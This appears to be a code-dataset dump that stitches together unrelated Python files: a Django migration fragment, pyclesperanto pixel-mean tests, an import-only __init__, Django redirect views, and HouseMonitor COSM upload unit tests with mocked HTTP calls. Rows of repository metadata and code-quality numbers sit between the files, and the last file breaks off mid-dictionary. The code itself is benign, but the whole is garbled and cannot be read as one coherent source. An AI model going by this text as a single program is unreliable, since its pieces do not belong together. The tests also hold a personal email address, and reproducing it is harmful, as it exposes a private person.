migrations.AlterField(
model_name='executabletaskinstance',
name='user',
field=models.ForeignKey(help_text='The author of this instance.', null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='executabletasktype',
name='user',
field=models.ForeignKey(help_text='The author of this task.', null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='taskqueue',
name='user',
field=models.ForeignKey(help_text='The creator of the queue.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 45.655738 | 173 | 0.656373 | 316 | 2,785 | 5.639241 | 0.189873 | 0.049383 | 0.078563 | 0.123457 | 0.835017 | 0.823232 | 0.766554 | 0.70202 | 0.657688 | 0.657688 | 0 | 0.008862 | 0.230162 | 2,785 | 60 | 174 | 46.416667 | 0.822295 | 0.016158 | 0 | 0.722222 | 1 | 0 | 0.226808 | 0.066472 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
68da0b35bc5ef5c3afca108eec5a6c421569db5d | 1,154 | py | Python | tests/test_mean_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 64 | 2020-03-18T12:11:22.000Z | 2022-03-31T08:19:18.000Z | tests/test_mean_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 148 | 2020-05-14T06:14:11.000Z | 2022-03-26T15:02:31.000Z | tests/test_mean_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 16 | 2020-05-31T00:53:44.000Z | 2022-03-23T13:20:57.000Z | import pyclesperanto_prototype as cle
import numpy as np
def test_mean_of_all_pixels_3d():
test1 = cle.push(np.asarray([
[
[0, 4, 0, 0, 2],
[0, 0, 0, 8, 0],
[3, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[0, 5, 2, 0, 0]
]
]))
s = cle.mean_of_all_pixels(test1)
assert s == 1
def test_mean_of_all_pixels_2d():
test1 = cle.push(np.asarray([
[0, 4, 0, 0, 2],
[0, 0, 0, 8, 0],
[3, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[0, 5, 2, 0, 0]
]))
s = cle.mean_of_all_pixels(test1)
assert s == 1
def test_mean_of_all_pixels_1d():
test1 = cle.push(np.asarray(
[0, 8, 0, 0, 2]
))
s = cle.mean_of_all_pixels(test1)
assert s == 2
def test_mean_of_all_pixels_1d_y():
test1 = cle.push(np.asarray(
[[0], [8], [0], [0], [2]]
))
s = cle.mean_of_all_pixels(test1)
assert s == 2
def test_mean_of_all_pixels_1d_z():
test1 = cle.push(np.asarray(
[[[0]], [[8]], [[0]], [[0]], [[2]]]
))
s = cle.mean_of_all_pixels(test1)
assert s == 2
| 19.233333 | 47 | 0.470537 | 186 | 1,154 | 2.688172 | 0.16129 | 0.1 | 0.084 | 0.3 | 0.892 | 0.892 | 0.848 | 0.844 | 0.844 | 0.844 | 0 | 0.114094 | 0.354419 | 1,154 | 59 | 48 | 19.559322 | 0.557047 | 0 | 0 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 1 | 0.119048 | false | 0 | 0.047619 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6b5a600b39a840b2e06dca7ac5f8de6e2efa9b0e | 116 | py | Python | Models/__init__.py | Kthyeon/micronet_neurips_challenge | 9f71fb752e8fbd5abca07be530f7fb19e164125c | [
"MIT"
] | 19 | 2019-11-27T07:18:35.000Z | 2021-08-20T14:16:17.000Z | Models/__init__.py | 3outeille/KAIST-AI-NeurIPS2019-MicroNet-2nd-place-solution | 9f71fb752e8fbd5abca07be530f7fb19e164125c | [
"MIT"
] | null | null | null | Models/__init__.py | 3outeille/KAIST-AI-NeurIPS2019-MicroNet-2nd-place-solution | 9f71fb752e8fbd5abca07be530f7fb19e164125c | [
"MIT"
] | 6 | 2019-12-18T02:09:54.000Z | 2021-06-21T11:34:36.000Z | from .MicroNet import *
from .MicroNet_Prune import *
from .imagenet_micro import *
from .MicroNet_imagenet import * | 29 | 32 | 0.801724 | 15 | 116 | 6 | 0.4 | 0.4 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12931 | 116 | 4 | 32 | 29 | 0.891089 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6b86e27e228580a34c9fa512ac5950dd23d57ef2 | 236 | py | Python | nadlogar/accounts/views.py | drobilc/nadlogar | be03cd1c8d016259d7ce478dd858a3aef55bb49a | [
"MIT"
] | null | null | null | nadlogar/accounts/views.py | drobilc/nadlogar | be03cd1c8d016259d7ce478dd858a3aef55bb49a | [
"MIT"
] | null | null | null | nadlogar/accounts/views.py | drobilc/nadlogar | be03cd1c8d016259d7ce478dd858a3aef55bb49a | [
"MIT"
] | null | null | null | from django.shortcuts import redirect
from django.conf import settings
def registracija(request):
return redirect(settings.FRANCEK_REGISTRACIJA)
def pozabljeno_geslo(request):
return redirect(settings.FRANCEK_POZABLJENO_GESLO) | 29.5 | 54 | 0.834746 | 28 | 236 | 6.892857 | 0.5 | 0.103627 | 0.217617 | 0.300518 | 0.373057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105932 | 236 | 8 | 54 | 29.5 | 0.914692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
6ba632c4d03850e5d0e7c81994988158ff1b9665 | 44,124 | py | Python | housemonitor/outputs/cosm/test/send_test.py | gary-pickens/HouseMonitor | 4b169bdbeed9013e1824d4bb929970ae0c27a6c9 | [
"MIT"
] | 1 | 2021-06-28T06:52:03.000Z | 2021-06-28T06:52:03.000Z | housemonitor/outputs/cosm/test/send_test.py | gary-pickens/HouseMonitor | 4b169bdbeed9013e1824d4bb929970ae0c27a6c9 | [
"MIT"
] | null | null | null | housemonitor/outputs/cosm/test/send_test.py | gary-pickens/HouseMonitor | 4b169bdbeed9013e1824d4bb929970ae0c27a6c9 | [
"MIT"
] | null | null | null | '''
Created on Dec 10, 2012
@author: Gary
'''
from housemonitor.configuration.cosmconfiguration import CosmConfiguration
from httplib2 import HttpLib2Error
from housemonitor.lib.common import Common
from housemonitor.lib.getdatetime import GetDateTime
from housemonitor.lib.constants import Constants
from housemonitor.lib.hmqueue import HMQueue
from mock import Mock, MagicMock, patch
from housemonitor.outputs.cosm.control import COSMControl
from housemonitor.outputs.cosm.outputStep import COSMOutputStep
from housemonitor.outputs.cosm.outputthread import COSMOutputThread
from housemonitor.outputs.cosm.send import COSMSend
import datetime
import httplib2
import json
import logging.config
import pprint
import unittest
class Test( unittest.TestCase ):
logger = logging.getLogger( 'UnitTest' )
def setUp( self ):
logging.config.fileConfig( "unittest_logging.conf" )
def tearDown( self ):
pass
config_data = \
{'device 1': {'port 1': {
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: 'disposition',
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 'lat',
Constants.Cosm.location.longitude: 'lon',
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: 'auto_feed_url',
Constants.Cosm.creator: 'creator',
Constants.Cosm.created: 'created',
Constants.Cosm.email: 'email',
Constants.Cosm.feed: 'feed',
Constants.Cosm.id: 'id',
Constants.Cosm.private: 'private',
Constants.Cosm.status: 'status',
Constants.Cosm.tags: 'tags',
Constants.Cosm.title: 'title',
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: 'version',
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
},
'device 2': {'port 1': {
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '2',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: 'disposition',
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 'lat',
Constants.Cosm.location.longitude: 'lon',
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: 'auto_feed_url',
Constants.Cosm.creator: 'creator',
Constants.Cosm.created: 'created',
Constants.Cosm.email: 'email',
Constants.Cosm.feed: 'feed',
Constants.Cosm.id: 'id',
Constants.Cosm.private: 'private',
Constants.Cosm.status: 'status',
Constants.Cosm.tags: 'tags',
Constants.Cosm.title: 'title',
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: 'version',
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
config_data_1 = \
{'device': {'port': {
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: 'disposition',
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 'lat',
Constants.Cosm.location.longitude: 'lon',
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: 'auto_feed_url',
Constants.Cosm.creator: 'creator',
Constants.Cosm.created: 'created',
Constants.Cosm.email: 'email',
Constants.Cosm.feed: 'feed',
Constants.Cosm.id: 'id',
Constants.Cosm.private: 'private',
Constants.Cosm.status: 'status',
Constants.Cosm.tags: 'tags',
Constants.Cosm.title: 'title',
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: 'version',
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}}}
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 1'
current_value = 10
data = {'device': device,
'port': port,
Constants.DataPacket.units: 'X',
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: current_value}
cs.createDataStream( device, port, data )
item = cs.datastreams.pop()
self.assertEqual( item[Constants.Cosm.datastream.min_value], 0 )
self.assertEqual( item[Constants.Cosm.datastream.max_value], 100 )
self.assertEqual( item[Constants.Cosm.datastream.tags], 'tags' )
self.assertEqual( item[Constants.DataPacket.current_value], current_value )
self.assertEqual( item['id'], '1' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_two_datapoints( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 1'
current_value = 10
data = {'device': device,
'port': port,
Constants.DataPacket.units: 'X',
Constants.DataPacket.action: Constants.DataPacket.accumulate,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: current_value}
cs.createDataStream( device, port, data )
# self.assertListEqual( cs.datapoints['1'], [{'at':'2012-01-02T03:04:05', 'value': 10}] )
cs.createDataStream( device, port, data )
# self.assertListEqual( cs.datapoints['1'], [{'at':'2012-01-02T03:04:05', 'value': 10}, {'at':'2012-01-02T03:04:05', 'value': 10}] )
data = {'device': device,
'port': port,
Constants.DataPacket.units: 'X',
Constants.DataPacket.action: Constants.DataPacket.accumulate,
Constants.DataPacket.action: Constants.DataPacket.send,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 6 ),
Constants.DataPacket.current_value: 11}
cs.createDataStream( device, port, data )
self.assertListEqual( cs.datapoints['1'], [] )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_bad_device( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 3'
port = 'port 1'
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: '12:12:12 12/12/11',
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'Device is not in cosm configuration file: device 3' ):
cs.createDataStream( device, port, data )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_bad_port( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 2'
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: '12:12:12 12/12/12',
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'Port is not in cosm configuration file: port 2' ):
cs.createDataStream( device, port, data )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_bad_no_arrival_time( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 1'
data = {'device': device,
'port': port,
# Constants.DataPacket.arrival_time: '12:12:12 12/12/13',
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'at is not in data' ):
cs.createDataStream( device, port, data )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_bad_no_current_value( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 1'
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: '12:12:12 12/12/14',
# Constants.DataPacket.current_value: 10
}
with self.assertRaisesRegexp( KeyError, 'current_value is not in data' ):
cs.createDataStream( device, port, data )
####################################################################################
# Test Location
####################################################################################
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createLocation( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: '12:12:12 12/12/15',
Constants.DataPacket.current_value: 10}
location = cs.createLocation( device, port )
self.assertEqual( location[Constants.Cosm.location.exposure], Constants.Cosm.location.exposure )
self.assertEqual( location[Constants.Cosm.location.domain], Constants.Cosm.location.domain )
self.assertEqual( location[Constants.Cosm.location.disposition], Constants.Cosm.location.disposition )
self.assertEqual( location[Constants.Cosm.location.latitude], Constants.Cosm.location.latitude )
self.assertEqual( location[Constants.Cosm.location.longitude], Constants.Cosm.location.longitude )
self.assertEqual( location[Constants.Cosm.location.private], Constants.Cosm.location.private )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createLocation_with_bad_device( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
with self.assertRaisesRegexp( KeyError, 'Device is not in cosm configuration file: device 3' ):
cs.createLocation( 'device 3', 'port 1' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createLocation_with_bad_port( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
with self.assertRaisesRegexp( KeyError, 'Port is not in cosm configuration file: port 2' ):
cs.createLocation( 'device 1', 'port 2' )
##########################################################
# test empty_datastreas
##########################################################
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_empty_datastream_list( self, config ):
options = None
cs = COSMSend( options )
cs.empty_datastream_list()
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
self.assertEqual( len( cs.datastreams ), 0 )
cs.createDataStream( device, port, data )
cs.createDataStream( device, port, data )
cs.empty_datastream_list()
##########################################################
# test feed
##########################################################
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createFeed( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs.createDataStream( device, port, data )
feed = cs.createFeed( data, device, port )
pprint.pprint( feed )
self.assertEqual( feed[Constants.Cosm.title], Constants.Cosm.title )
self.assertEqual( feed[Constants.Cosm.status], Constants.Cosm.status )
self.assertEqual( feed[Constants.Cosm.creator], Constants.Cosm.creator )
self.assertEqual( feed[Constants.Cosm.created], Constants.Cosm.created )
self.assertEqual( feed[Constants.Cosm.feed], 'url' )
self.assertEqual( feed[Constants.Cosm.email], Constants.Cosm.email )
self.assertEqual( feed[Constants.Cosm.id], Constants.Cosm.id )
self.assertEqual( feed[Constants.Cosm.auto_feed_url], ( 'url', ) )
self.assertEqual( feed[Constants.Cosm.version], Constants.Cosm.version )
cs.empty_datastream_list()
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createFeed_with_no_device_in_config_file( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data_1
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'Device is not in cosm configuration file:.*' ):
feed = cs.createFeed( data, device, port )
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createFeed_with_no_port_in_config_file( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port'
config.assert_called_once_with()
cs.config = self.config_data
data = {
Constants.DataPacket.device: device,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'Port is not in cosm configuration file:.*' ):
feed = cs.createFeed( data, device, port )
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createFeed_with_two_datestreams( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data
data = {'device': device,
'port': port,
Constants.DataPacket.action: Constants.DataPacket.accumulate,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs.createDataStream( device, port, data )
data[Constants.DataPacket.current_value] = 545454
cs.createDataStream( device, port, data )
data['device'] = device = 'device 2'
data[Constants.DataPacket.current_value] = 999
cs.createDataStream( device, port, data )
data['device'] = device = 'device 1'
data[Constants.DataPacket.action] = Constants.DataPacket.send
cs.report_data = MagicMock()
cs.output( data )
pprint.pprint( cs.json )
pprint.pprint( cs.datapoints )
# self.assertEqual( cs.[Constants.Cosm.title], Constants.Cosm.title )
# self.assertEqual( cs.json[Constants.Cosm.status], Constants.Cosm.status )
# self.assertEqual( cs.json[Constants.Cosm.creator], Constants.Cosm.creator )
# self.assertEqual( cs.json[Constants.Cosm.created], Constants.Cosm.created )
# self.assertEqual( cs.json[Constants.Cosm.feed], 'url' )
# self.assertEqual( cs.json[Constants.Cosm.email], Constants.Cosm.email )
# self.assertEqual( cs.json[Constants.Cosm.id], Constants.Cosm.id )
# self.assertEqual( cs.json[Constants.Cosm.auto_feed_url], ( 'url', ) )
# self.assertEqual( cs.json[Constants.Cosm.version], Constants.Cosm.version )
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createJSONReport( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = config_data = \
{'device 1': \
{'port 1': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs.createDataStream( device, port, data )
data[Constants.DataPacket.current_value] = 545454
cs.createDataStream( device, port, data )
json = cs.createJSONReport( device, port, data )
pprint.pprint( json )
cs.empty_datastream_list()
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data( self, config ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
response = Mock( status=200 )
attrs = {'request.return_value': ( response, 3 )}
http = Mock( **attrs )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.httplib2.Http' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_passing_in_http( self, config, http ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
http = Mock()
response = Mock()
attrs = {'request.return_value': ( response, 3 )}
http.configure_mock( **attrs )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_with_300_status( self, config ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
response = Mock( status=300 )
attrs = {'request.return_value': ( response, 3 )}
http = Mock( **attrs )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_in_test_mode( self, config ):
device = 'device'
port = 'port'
options = MagicMock()
options.in_test_mode = MagicMock()
http = Mock()
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
